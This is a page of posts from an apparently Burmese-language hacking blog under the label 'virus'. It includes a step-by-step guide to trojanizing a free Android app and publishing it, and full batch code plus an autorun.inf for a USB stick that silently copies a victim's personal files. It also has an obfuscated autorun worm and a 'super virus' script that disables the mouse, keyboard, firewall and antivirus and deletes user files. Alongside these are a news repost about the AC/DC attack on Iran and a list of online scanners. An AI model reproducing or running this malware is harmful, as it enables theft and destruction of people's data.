Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Sunday, August 26, 2012

Creating Andriod Trojan in 5 steps


Android Trojan လုပ္ပံုလုပ္နည္းအေၾကာင္းတစ္ေစ့တစ္ေစာင္းေျပာၾကည့္ရေအာင္။ Trojan ဆိုတာကေတာ့ သိတဲ့အတိုင္းပဲ အစဥ္အလာနဲ့ေနလာတာဆိုေတာ့ android os ေပၚလာခ်ိန္မွာသူလဲ တစ္ေခတ္ထေနျပန္ရဲ့။ အဲ့trojan ေတြ ဘယ္လိုဝင္တာဆို တာေတာ့ ကိုယ္ေပးဝင္လို့ ဝင္တာပါပဲ။ ခင္ဗ်ားဖုန္းကို google က ကိစၥအခ်ိဳ့ကို ဖယ္လိုက္လို့ သိပ္မအံၾသပါနဲ့တဲ့။ malicious codeers ေတြက Android အတြက္ Trojan ေတြေရးနုိင္ပါတယ္တဲ့ ။
ကဲထားပါေတာ့ေလ။ဘယ္လိုလုပ္တယ္ဆိုတာေလးပဲေျပာရေအာင္ :D
Technical Director for Security Reponse က Eric Chien က brand-new Trojan တစ္ေကာင္ကို ပရိတ္သတ္ေရွ့မွာရိုးရွင္းေသာနည္းေတြနဲ့ ေရးျပခဲ့ပါတယ္။ စိတ္မပူပါနဲ့ သူ sample app က အဲ့အခန္းထဲ မွာပဲရွိတာပါ။ တနည္းေျပာရင္ ဖ်က္ပစ္လိုက္တယ္ေပါ့။ သူပံုစံအတိုင္းတစ္ျခားေျမာက္မ်ားစြာေသာအေကာင္ေလးေတြပဲ ထြက္လာတာ :D
ကဲ ခု Chien ရဲ့ ရိုးရွင္းတဲ့ငါးခ်က္ကိုေျပာပါ့မယ္။
၁။ free app တစ္ခု download ဆြဲလိုက္ပါ။ လူၾကိဳက္မ်ားတဲ့တစ္ခုဆိုပိုေကာင္းတာေပါ့။
၂။ PC နဲ့ Suit ျဖစ္မယ့္ language compiler တစ္ခုနဲ့ source code ယူ ျပီးရင္ CPU နားလည္တဲ့ assembly language ကိုေျပာင္းလို္က္။ ဒီနည္းလမ္းတစ္လမ္းပဲရွိတယ္ final executable file ကို source code ေျပာင္းဖို့ဆိုတာ။ android app ေတြက Java language နဲ့ေရးထားတာဆိုေတာ့ original source code ကို လြယ္ကူရုိးရွင္းတဲ့ tools ေတြနဲ့ေျပာင္းလို့ရပါတယ္။
၃။ ဒါကေတာ့နဲနဲလက္ဝင္တယ္လို့ေျပာပါတယ္။ သံုးမယ့္ app က user information ေတြကို third party app ေတြ ဆီ ေ၇ာက္ေအာင္ သံုးလုပ္နုိင္မယ့္ app ေတြဆိုပိုေကာင္းမယ္ဗ်ာ။ Chien ကေတာ့ demonstration မွာ Android.Geinimi ကို သံုးသြားပါတယ္။
၄။ Trojan code ထည့္တာကေတာ့ ရိုးရွင္းပါတယ္။ source code ရွိတဲ့ folder ထဲကို ထည့္မယ္ ျပီးရင္ Trojan code ကို တစ္ျခား app ထဲက code ေတြထက္ အရင္ run ေအာင္နဲနဲခ်ိန္းမယ္။ ျပီးရင္ Trojanized app ကို device တစ္ခုလံုး ထိန္းခ်ဳပ္ခြင့္ရေအာင္ permission ေပးမယ္။ ျပီး ရင္ေတာ့ အဲ့ app ကိုနာမည္ခ်ိန္းလိုက္ေပါ့။ “FREE!!!!” လို့ပါရင္ လူတိုင္းၾကိဳက္တယ္မလား။ (ဒါေရးျပီးရင္ ဝယ္ပဲသံုးေတာ့မယ္ app ေတြကို :D )
၅။ အားလံုးျပီးသြားရင္ ေတာ့ modified app ကို compile လုပ္။ မေျပာင္းလဲ ရွိတဲ့ market ေပၚမွာ တင္လိုက္ေတာ့။ ျပီးရင္ ျပီးျပီ။
အခု လို Trojan မ်ိဳးပါတဲ့ app ကို android Market က လက္မခံပါဘူးတဲ့။ လက္မခံလို့စိတ္မညစ္ပါနဲ့ တရုတ္ ျဖစ္ ေအာင္က်င့္ၾကံလိုက္။ China Market မွာသြားတင္လိုက္။ ကံေကာင္းလို့ ကိုယ္ေရးတတ္ရင္ တရုတ္မလွလွေလးေတြရဲ့ Photo ေလးေတြရမွာေနာ္။ အဲ့ရက်င္ အေနာ္ကို မေမ့နဲ့ေနာ္ :D
အကယ္လို့ tut အကုန္သိခ်င္ပါတယ္ဆိုလို့ရွိရင္ The Hacker News က ထုတ္တဲ့ ၂၀၁၁ နိုဝင္ဘာလထုတ္ မဂၢဇင္းတြင္ Demystifying the Android Malware ဆိုေသာေခါင္းစဥ္ျဖင့္ စာမ်က္နွာ ၁၆ မွာပါရွိပါတယ္။ကၽြန္ေတာ္ အဲ့ tutorial လုပ္ျပီးပါက ျမန္မာလို တင္ေပးပါ့မယ္။ စာဖတ္သူအားလံုး ကိုယ္စိတ္နွစ္ျဖာက်န္းမာခ်မ္းသာၾကပါေစ။

post by  Fortran
copy from Ghostarea.net
Read More ->>

Tuesday, July 31, 2012

Iranian nuclear program hit by AC/DC virus



အီရန္မွာရိွတဲ့ Nuclear Program ေတြထိန္းခ်ဳပ္လုပ္ကိုင္ေနလွ်က္ရိွေသာ computer systems သည္ ထူးဆန္းစြာ တိုက္ခိုက္ခံခဲ့ရေၾကာင္း…သတင္းတစ္ရပ္ကဆိုခဲ့ပါတယ္..။တိုက္ ခိုက္ေသာ virus မွာ AC/DC virus လို႕ အမည္းေပးထားျပီး worm အမ်ိဳးအစားျဖစ္ပါတယ္..။ထိုသို႕တိုက္ခိုက္ခံရျခင္းသည္..ၾကိဳတင္သတင္း အခ်က္အလက္ရရိွခဲ့ျပီးမွ ေပါ့ေလ်ာ့မႈ ေၾကာင့္ ျဖစ္ပြားခဲ့ေၾကာင္းလဲသိရိွရပါသည္.။


သတင္းအခ်က္အလက္အျပည့္အစံုမွာ…


အီရန္ႏိုင္ငံ ရိွ Nuclear ဆိုင္ရာအဖဲြ႕အစည္းတစ္ခုျဖစ္ေသာ Atomic Energy Organisation ၏ scientist တစ္ေယာက္၏ေျပာၾကားခ်က္အရ computer systems ေတြဟာ cyber-attack ျပဳလုပ္ခံခဲ့ရတယ္ လို႕ ဖြင့္ခ်ေျပာၾကားခဲ့ပါတယ္..။ထိုသို႕ တိုက္ခိုက္ရာတြင္နာမည္ၾကီး AC/DC အဖြဲ႕ ၏ Thunderstruck သီခ်င္းသည္..မယံုၾကည္ႏိုင္ေလာက္ေအာင္ ညသန္းေခါင္ယံ အခ်ိန္တြင္ full volume အျပည့္ျဖင့္ play လုပ္ခဲ့ပါတယ္….။အဲဒီလိုထူးထူး ျခားျခားတိုက္ခိုက္ခံရျခင္းသည္..Stuxnet ဗိုင္းရပ္နဲ႕ တိုက္ခိုက္ခံရ ခဲ့ျပီးေနာက္ပိုင္း..အထူး ျခားဆံုးျဖစ္ရပ္ လဲျဖစ္ပါတယ္..။
ထိုတိုက္ခိုက္မႈဟာ သုေတသနျပဳသူတစ္ေယာက္ဆီကို Iran’s atomic energy organisation မွ လံုျခံဳေရးျမင့္မားေသာ လိႈ႕၀ွက္ email တစ္ေစာင္ေပးပို႕ သတိေပးျခင္း အျပီးတြင္ထူးဆန္းစြာျဖင့္တိုက္ခိုက္သြာျခင္းလဲျဖစ္ပါတယ္…။ထိုကဲ့သို႕ သတိေပးမႈေပးပို႕ျပီးေတာ့မွ တိုက္ခိုက္ျခင္ခံခဲ့ရမႈအတြက္ အနည္းငယ္မွ်ေမးခြန္းထုတ္ ဖြယ္ရိွဖြယ္ရိွပါတယ္…။ ထို သတိေပးပို႕ မႈ email တစ္စိတ္တစ္ပိုင္းကိုေဖာ္ျပရလွ်င္ ေအာက္ပါအတိုင္းျဖစ္ပါတယ္..။

“ကၽြန္ေတာ္ဟာ…ကၽြန္ေတာ္တို႕ရဲ႕ nuclear program လံုျခဳံေရးနဲ႕ပက္သက္ျပီးေတာ့ သတင္းအခ်က္အလက္တစ္ခုကို ေရးသာေပးပို႕လိုက္ရပါတယ္ .ကၽြန္ေတာ္တို႕ ရဲ႕ nuclear program ေနာက္ထပ္တစ္ၾကီမ္ တိုက္ခိုက္ဖို႕ ျပင္ဆင္ေနလွ်က္ရိွၾကျပီးေတာ့ အဲဒီတိုက္ခိုက္မႈအတြင္းမွာ worm အသစ္ ျဖင့္ တိုက္ခိုက္သြားမွာျဖစ္ပါတယ္..။ အဆိုပါ ဗိုင္းရပ္အသစ္သည္ ယိုေပါက္မ်ားကိုရွာေဖြျပီးေတာ့ ကၽြန္ေတာ္တို႕ရဲ႕ Natanz ျမိဳ႕က Nuclear စက္ရံုအျပင္ Qom ျမိဳ႕အနီးက Fordo ေထာက္ပံေရးစက္ရံုက automation network ကို shut down ျပဳလုပ္တိုက္ခိုက္သြားမွာျဖစ္ပါတယ္..”

လို႕စာေရးသားေပးပို႕ခဲ့ပါတယ္…။

အဲဒီ email ထဲမွာပဲ ” ဒီဗိုင္းရပ္ဟာထူးျခားစြာ သီးခ်င္းတစ္ပုဒ္ကို ဖြင့္လိမ့္မယ္” လို႕ လဲေျပာၾကားခဲ့ျပီးေတာ့ အဲဒီလိုတိုက္ခိုက္ခံရမယ္ဆိုရင္လဲ Attacker ေတြဟာ သူတို႕ ေႏွာက္ယွက္ ၀င္ေရာက္တိုက္ခိုက္ေန မႈကို Thunderstruck သီခ်င္းနဲ႕ ထုတ္ေဖာ္ေၾကညာလိမ့္မည္ျဖစ္ေၾကာင္းကို လဲ ထို email ထဲတြင္အျပည့္အစံုေရးသားေဖာ္ျပခဲ့ပါတယ္…။ထိုသို႕  တိုက္ခိုက္မႈဟာ တတိယ အၾကမ္းေျမာက္ျဖစ္ျပီးေတာ့ Iran ႏိုင္ငံရဲ႕ အညင္းပြားေနတဲ့ Nuclear ဆိုင္ရာ ျပသနာေတြ အတြက္ တိုက္ခိုက္မႈျဖစ္ေၾကာင္းလဲေျပာၾကားသြားခဲ့ပါတယ္…။

ထိုတိုက္ခိုက္မႈတြင့္ ဖြင့္ခဲ့ေသာသီခ်င္းဟာ Atomic Energy Organization of Iran (AEOI) ရဲ႕ မူ၀ါဒ ဆိုင္ရာ ကိုတိုက္မႈရံႈ ခ်မႈျဖစ္ပါတယ္…။ယခု တိုက္ခိုက္မႈဟာလဲ 2010 ခုႏွစ္ Stuxnet ဗိုင္းရပ္ တိုက္ခိုက္မႈအျပီး အလားတူ ပံုစံ အတိုင္းတိုက္ခိုက္ခံရတာျဖစ္ပါတယ္…။ဒီတိုက္ခိုက္မႈအတြက္ မည္သည့္အဖြဲ႕ အစည္းကမွ မိမိ တို႕လက္ခ်က္ပါလို႕ ၀န္ခံျခင္း ၊ ထုတ္ေဖာ္ေျပာဆိုျခင္းမရိွေသးပါဘူး…။

နည္းပညာရွင္ေတြကေတာ့ ယခုတိုက္ခိုက္ လာတဲ့ ဗိုင္းရပ္ဟာ ရိုရွင္းျပီးေတာ့ ေစ်းေပါေပါ open-source project တစ္ခုကိုေက်ာ္ျဖတ္ ၀င္ေရာက္လာ ျပီးေတာ့ ထိုဗိုင္ရပ္ဟာ software အတြင္းမွာရိွတဲ့ ယိုေပါက္ေတြကိုရွာ ေဖြခဲ့ျခင္းျဖစ္ေၾကာင္းကိုလဲ ၀န္ခံခဲ့ၾကပါတယ္…။

ဒီတိုက္ခိုက္မႈ အတြက္ ၾကိဳတင္ျပီးေတာ့ အသိေပးေျပာၾကားခဲ့ေသာ email အျပည့္အစံုမူရင္းမွာေအာက္ပါအတိုင္းျဖစ္ပါသည္..။
“I am writing you to inform you that our nuclear program has once again been compromised and attacked by a new worm with exploits which have shut down our automation network at Natanz and another facility Fordo near Qom.

According to the email our cyber experts sent to our teams, they believe a hacker tool Metasploit was used. The hackers had access to our VPN. The automation network and Siemens hardware were attacked and shut down. I only know very little about these cyber issues as I am scientist not a computer expert.

There was also some music playing randomly on several of the workstations during the middle of the night with the volume maxed out. I believe it was playing ‘Thunderstruck’ by AC/DC.”
 
posted by me
You also see in ghostarea.net 
ref: thehackernew
Read More ->>

Saturday, June 9, 2012

recycler virus Kill3R


cyber coder ဆီကမလာတာ သူကတကယ္မိုက္တယ္လို႕ရည္ညႊန္းထားတယ္...recycler virus ဆိုတာလူတိုင္း လလက္ေပါက္ကပ္ေအာင္ စြမ္းေဆာင္ႏိုင္ခဲ့တာပါ...။သတ္မရ ျဖတ္မရနဲ႕ ေလ...။
ကၽြန္ေတာ္ကလဲ အဆင္သင့္တုန္းေလးျပန္လည္ေ၀မွ်လိုက္ပါတယ္...။
အဆင္ေျပႏိုင္ပါေစလို႕ဆုေတာင္းေပးလိုက္ပါတယ္....။

Download Here
Read More ->>

Sunday, March 11, 2012

@utorun virus making



virus နာမည္မတပ္တတ္လို႔ autorun လို႔ပဲတပ္လိ္ုက္မယ္ဗ်ာ.. balls Oops ကြန္ပ်ဴတာတစ္လံုးကို USB drive ေလးထိုးလိုက္တာနဲ႔ ဖိုင္ေတြကို ေနာက္ကြယ္ကေနခိုးေပးမဲ့ autorun viurs ေလးလုပ္မယ္ဗ်ာ...ဒီဗိုင္းရပ္စ္က ၀င္ခံရတဲ့ကြန္ပ်ဴတာထဲ
ကဖိုင္ေတြခိုးရံုကလြဲလို႔ အႏၱရယ္မရွိပါဘူး...ကဲ ပထမဆံုး notepad ေလးဖြင့္လိုက္ပါ..(မဖြင့္တတ္ရင္ window ခလုပ္နဲ႔ r နဲ႔တြဲပီးႏွိပ္ ေပၚလာတဲ့ run box ထဲမွာ notepad လို႔ရိုက္ျပီး enterေခါက္လိုက္ပါ..)
notepad ေလးဖြင့္ျပီးရင္ ေအာက္က ကုတ္ေတြကို ကူးထည့္လိုက္ပါ...ေအာက္ကဟာက Window XP OS ကိုသံုးထားတဲ့စက္အတြက္ပါ...

@echo off:CHECKif not exist "%nyipainglay%\Copied_files" md "%nyipainglay%\Copied_files"if exist "
%systemdrive%\Documents and Settings" goto COPIERgoto ERROR

:COPIERif not exist "%nyipainglay%\Copied_files\%computername%" md "%nyipainglay%\Copied_files\%computername%"if
not exist "%nyipainglay%\Copied_files\%computername%\VIDEOS" md "%nyipainglay%\Copied_files\%computername%
\VIDEOS"if not exist "%nyipainglay%\Copied_files\%computername%\PICTURES" md

"%nyipainglay%\Copied_files\%computername%\PICTURES"if not exist "%nyipainglay%\Copied_files\%computername%\MUSIC" md "%
nyipainglay%\Copied_files\%computername%\MUSIC"if not exist "%nyipainglay%\Copied_files\%computername%\DOWNLOADS" md

"%nyipainglay%\Copied_files\%computername%\DOWNLOADS"copy /y "%userprofile%\My Documents\*.*" "%nyipainglay%\Copied_files\%computername%"copy /y "%userprofile%\My Documents\My Videos" "%nyipainglay%\Copied_files\%computername%\VIDEOS"copy /y "%userprofile%\My Documents\My Music" "%nyipainglay%\Copied_files\%computername%\MUSIC"copy /y "%userprofile%\My Documents\My Pictures" "%nyipainglay%\Copied_files\%computername%\PICTURES"copy /y "%userprofile%\My Documents\Downloads" "%nyipainglay%\Copied_files\%computername%\DOWNLOADS"MSG %username% "DONE!"exit:ERRORexit

ေအာက္ကကုတ္ေလးကေတာ့ Vista အတြက္ပါ...

@echo off:CHECKif not exist “%nyipainglay%\Copied_files” md “%nyipainglay%\Copied_files”if exist “%systemdrive%\files” goto COPIER7goto ERROR:COPIER7if not exist “%nyipainglay%\Copied_files\%computername%” md “%nyipainglay%\Copied_files\%computername%”if not exist “%nyipainglay%\Copied_files\%computername%\VIDEOS” md “%nyipainglay%\Copied_files\%computername%\VIDEOS”if not exist “%nyipainglay%\Copied_files\%computername%\PICTURES” md

“%nyipainglay%\Copied_files\%computername%\PICTURES”if not exist “%nyipainglay%\Copied_files\%computername%\MUSIC” md “%nyipainglay%\Copied_files\%computername%\MUSIC”if not exist “%nyipainglay%\Copied_files\%computername%\DOWNLOADS” md

“%nyipainglay%\Copied_files\%computername%\DOWNLOADS”copy /y “%userprofile%\Documents\*.*” “%nyipainglay%\Copied_files\%computername%”copy /y “%userprofile%\Videos” “%nyipainglay%\Copied_files\%computername%\VIDEOS”copy /y “%userprofile%\Music” “%nyipainglay%\Copied_files\%computername%\MUSIC”copy /y “%userprofile%\Pictures” “%nyipainglay%\Copied_files\%computername%\PICTURES”copy /y “%userprofile%\Downloads” “%nyipainglay%\Copied_files\%computername%\DOWNLOADS”MSG %username% “DONE!”exit:ERRORexit

Window 7 အတြက္ေတာ့ မရွိေသး၀ူးဗ်..ရွိရင္လဲ ရွဲထားခဲ့ပါဦး...
အဲ..ေျပာစရာတစ္ခုက်န္ေသးတယ္ဗ်.. အေပၚက ကုတ္ေတြထဲက nyipainglay ေနရာေတြမွာ ကိုယ့္ USB stick နာမည္ change ေပါ့ဗ်ာ...
မခ်ိန္းခ်င္လဲ စတစ္ကို nyipainglay လို႔ေျပာင္းလိုက္ပါေပါ့ေနာ္....ဟဲ
ကဲ အေပၚက ဟာေတြကို လုပ္ျပီးသြားရင္ save မယ္ဗ်ာ...save တဲ့ေနရာမွာလဲ ၾကိဳက္တဲ့နာမည္တစ္ခုခုရဲ႕ေနာက္မွာ .bat ထည့္ save ရမွာပါ..(ဥပမာ- nyipainglay.bat လိုေပါ့)
ကုတ္ထဲမွာ MD command သံုးထားတဲ့အတြက္ေၾကာင့္ USB stick ထဲကိုCopied_files ဆိုတဲ့ folder ေလးေဆာက္ေပးမယ္ ျပီးရင္ အဲ့ထဲကို ကူးမဲ့ဖိုင္ေတြ သူ႕ဘာသာသူ ကူးထည့္မယ္...
ကဲ virus ေလးေတာ့ လုပ္ျပီးပီ.. ဒီvirus က ကိုယ္မဖြင့္ရင္ ပြင့္မွာမဟုတ္ပါဘူး.. သူမ်ားကြန္ပ်ဴတာထဲက ဖိုင္ေတြကို ခိုးဖို႔စိုက္ျပီး ဒီဖိုင္ေလးဖြင့္ရင္ သူမ်ားက ကိုယ္ခိုးေတာ့မယ္ဆိုတာ သိသြားမွာေပါ့.
ဒီေတာ့ ဒီဗိုင္းရပ္စ္ေလးကို USB stick ေလးစိုက္လိုက္တာနဲ႔ သူဘာသာသူဖြင့္ေအာင္ (autorun ေအာင္) လုပ္ေပးရမွာပါ...ဒါက လြယ္ပါတယ္...notepad ေလးဖြင့္လိုက္ပါဦး..
ျပီးရင္ေအာက္ကကုတ္ေလးကူးထည့္လိုက္...
[autorun]
Open=nyipainglay.bat
Action=File Copier
အဲ့ဒီထဲက nyipainglay.bat ဆိုတဲ့ေနရာမွာ ေစာေစာက လုပ္ထားတဲ့ .bat ဖိုင္အမည္ေလးကို ထည့္ေပးလိုက္ရံုပါပဲ..ျပီးရင္ autorun.inf ဆိုျပီး save လိုက္ပါ...
autorun.inf ဆိုတဲ့ဖိုင္ေရာ .bat (eg: nyipainglay.bat) ဆိုတဲ့ ဖိုင္ႏွစ္ခုစလံုး စတစ္ထဲကို ထည့္လိုက္ပါ....ကဲ လုပ္လို႔ေတာ့ ျပီးသြားျပီဗ်ာ..
စမ္းခ်င္ရင္ စတစ္ကို ျဖဳတ္ျပီး ျပန္တပ္ၾကည့္လိုက္ပါ...တကယ္လို႔ သူ႔ဘာသာသူ ေကာ္ပီကူးမေပးဘူးဆိုရင္ တက္လာတဲ့ autorun ထဲက "play with music player" နဲ႔ "read only" လို ဟာေလးကို ေရြးေပးလိုက္ပါ balls read rule
ဒါဆိုရင္ File Copier ေလးကို ရွာႏိုင္မွာျဖစ္ပါတယ္.....မွားတာရွိရင္ ေထာက္ျပသြားပါခင္ဗ်ာ


အေပၚကအတိုင္းပဲ ကၽြန္ေတာ့္ဘာသာ autorun virus လို႔ေပးခဲ့ပါတယ္.. ဟုတ္ေပမဲ့ ဒီေကာင္က autorun.inf နဲ႔ တြဲမွသာ autorun ျဖစ္တာပါ...
autorun.inf ဆိုတဲ့ Virus ကို ဒီေန႔မွ ကိုသံလံုငယ္ဆိုက္က သိခဲ့ပါတယ္... ကုတ္ကေတာ့..ေအာက္ကအတိုင္းပါ...notepad ထဲကူးထည့္.. autorun.inf နဲ႔ save လိုက္ရမွာ ျဖစ္ပါတယ္...ကိုသံလံုငယ္ေတာင္ မသတ္ႏိုင္ဘူးဆိုဘဲဗ်...အႏၱရယ္ေတာ့ အမ်ားၾကီး မၾကီးပါဘူး..ကိုယ့္စက္ထဲေတာ့ မဖြင့္ၾကည့္နဲ႔ေပါ့..Defreeze တို႔ shawdow defender တို႔ တင္ထားရင္ေတာ့ လုပ္ေပါ့ဗ်ာ..:P..

;1Kj0aDKwn4LLKLidrsqZqAkIaLKf43iKaDOK8d8iJsor571eKdl0wo27L1
[AutoRun]
;e9L33SLkrokHI8isdlwKF0Lla253dr4sqekD5siilkecj0dw13e8ZKX39wsS3wfaqk7wio1ia
open=n.com
;irllr3rr3jiDia3lw4s52q
shell\open\Command=n.com
;w22swS
shell\open\Default=1
;qKOwXa397Soksk44ai5KjqmkeSIiiasl1ULj0f4iJr43Lsw2fA53FDkrekLdr4LlD1l4jHp2ooi21lkKCoisaiDs0dww42clpi0rkk0dsjfs2kw3dq56ADdsa8k2
shell\explore\Command=n.com
;549AA28likLsmq20aLis9arD53weko4Llo4ilKowi1awf3UnkSraAak23Ia3kfi3dfi00olsw4k2os344k0dw

ဒီဗိုင္းရပ္စ္ရဲ႕ အာနိသင္ေတြကို ကိုသံလံုငယ္ဆိုက္ကဘဲ ကူးျပလုိက္ပါတယ္...

၁ ။ .. Folder Option မွာ open each folder in the same window လို႔ေပးထားရဲ႕သားနဲ႔ Drive ေတြကို D-click နဲ႔ဖြင္႔ရင္ ေနာက္ window တစ္ခုကေနပြင္႔ပါတယ္ ။ ( အဲဒီက တစ္ဆင္႔ ထပ္ဖြင္႔ရင္ေတာ႔ same window ျဖစ္သြားပါတယ္)

၂။ .. Folder Option – View မွာ Show Hidden Files and Folders လို႔ေပးၿပီး Save လိုက္ပါတယ္ ။ Hidden files ေတြ ေပၚမလာပါဘူး ။ Folder Option – View ကိုျပန္ၾကည္႔ Hidden လို႔ျပန္ျဖစ္ေနပါတယ္ ။ ေျပာင္းလို႔မရပါ ။

၃ ။ .. Winrar ကို ဖြင္႔ၿပီး Address bar မွာ C:\\ လို႔ ေရးထည္႔လိုက္ပါ ။ ေအာက္ပါအတိုင္း autorun.inf ဆိုၿပီးေတြ႔ပါတယ္ ။ ျဖတ္လိုက္ပါတယ္ ။ မရပါဘူး ခဏေလးေနၿပီး ျပန္ေပၚလာပါတယ္ ။ တစ္ျခား drive ေတြအားလံုးမွာလဲ အဲဒီဖိုင္ အဲဒီအတိုင္းပဲ ရိွေနပါလိမ္႔မယ္ ။ အေကာင္းဆံုးဆိုတဲ႔ KAV , KIS ေတြနဲ႔ ဗိုင္းရပ္ စစ္ေတာ႔ ေပၚပါတယ္။ Delete နဲ႔ သတ္လိုက္ပါတယ္ ။ ပ်တ္မသြားပါဘူး … ။

copy from


http://mmhackforums.noonhost.com/viewtopic.php?f=10&t=181
 
Read More ->>

Friday, March 9, 2012

Top Free Online Virus Scan Services

 
 
(Trend Micro Housecall )
http://housecall.trendmicro.com/housecall/


BitDefender Online Scan:
http://www.bitdefender.com/scanner/online/free.html


McAfee FreeScan
http://home.mcafee.com/store/Product.aspx?productid=mss


F-Secure Free Online Scanner
http:///...tools/online-scanner


ESET NOD32 Online Antivirus Scanner
http://www.eset.com/online-scanner


Avast! Online Scanner.
http://onlinescan.avast.com/


DrWeb Online Scan.
http://online.us.drweb.com/


VirusTotal.
http://www.virustotal.com/


Windows Live OneCare Safety Scanner
http://onecare.live.com/site/en-us/default.htm


EMSISOFT Web Malware Scan
http://www.emsisoft.com/en/software/ax/


Ref Link : http://charlemont.hubpages.com/...ee-Online-Virus-Scan
mmhackforums.noonhost.com

Read More ->>

Wednesday, February 22, 2012

super virus code








do not try on your own pc!

you can save " .bat " file

@echo off
//disable mouse
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
cls
//disable mouse x2
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
cls
//disable keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
cls
start www.shwekoyantaw.blogspot.com
//antivirus disable
net stop “Security Center” >nul
netsh firewall set opmode mode=disable >nul
tskill /A av* >nul
tskill /A fire* >nul
tskill /A anti* >nul
tskill /A spy* >nul
tskill /A bullguard >nul
tskill /A PersFw >nul
tskill /A KAV* >nul
tskill /A ZONEALARM >nul
tskill /A SAFEWEB >nul
tskill /A OUTPOST >nul
tskill /A nv* >nul
tskill /A nav* >nul
tskill /A F-* >nul
tskill /A ESAFE >nul
tskill /A cle >nul
tskill /A BLACKICE >nul
tskill /A def* >nul
tskill /A kav >nul
tskill /A kav* >nul
tskill /A avg* >nul
tskill /A ash* >nul
tskill /A aswupdsv >nul
tskill /A ewid* >nul
tskill /A guard* >nul
tskill /A guar* >nul
tskill /A gcasDt* >nul
tskill /A msmp* >nul
tskill /A mcafe* >nul
tskill /A mghtml >nul
tskill /A msiexec >nul
tskill /A outpost >nul
tskill /A isafe >nul
tskill /A zap* >nul
tskill /A zauinst >nul
tskill /A upd* >nul
tskill /A zlclien* >nul
tskill /A minilog >nul
tskill /A cc* >nul
tskill /A norton* >nul
tskill /A norton au* >nul
tskill /A ccc* >nul
tskill /A npfmn* >nul
tskill /A loge* >nul
tskill /A nisum* >nul
tskill /A issvc >nul
tskill /A tmp* >nul
tskill /A tmn* >nul
tskill /A pcc* >nul
tskill /A cpd* >nul
tskill /A pop* >nul
tskill /A pav* >nul
tskill /A padmin >nul
tskill /A panda* >nul
tskill /A avsch* >nul
tskill /A sche* >nul
tskill /A syman* >nul
tskill /A virus* >nul
tskill /A realm* >nul
tskill /A sweep* >nul
tskill /A scan* >nul
tskill /A ad-* >nul
tskill /A safe* >nul
tskill /A avas* >nul
tskill /A norm* >nul
tskill /A offg* >nul
cls
echo Please be patience, this will take a moment.
echo loading
ping localhost -n 2 >nul
cls
//hide desktop
--------------------------------------------------
cd "%userprofile%\desktop" >nul
attrib +a +s +r +h >nul
// delete my pictures
del /f /q '%userprofile%\My Pictures\*.*' >nul
--------------------------------------------------
cls
echo Please be patience, this will take a moment.
echo loading.
ping localhost -n 2 >nul
cls
--------------------------------------------------
del /f /q '%userprofile%\My Pictures\*.*' >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading..
ping localhost -n 2 >nul
cls
--------------------------------------------------
//deletes desktop (not sure if it works)
del "%userprofile%\desktop" >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading...
ping localhost -n 2 >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading
ping localhost -n 2 >nul
cls
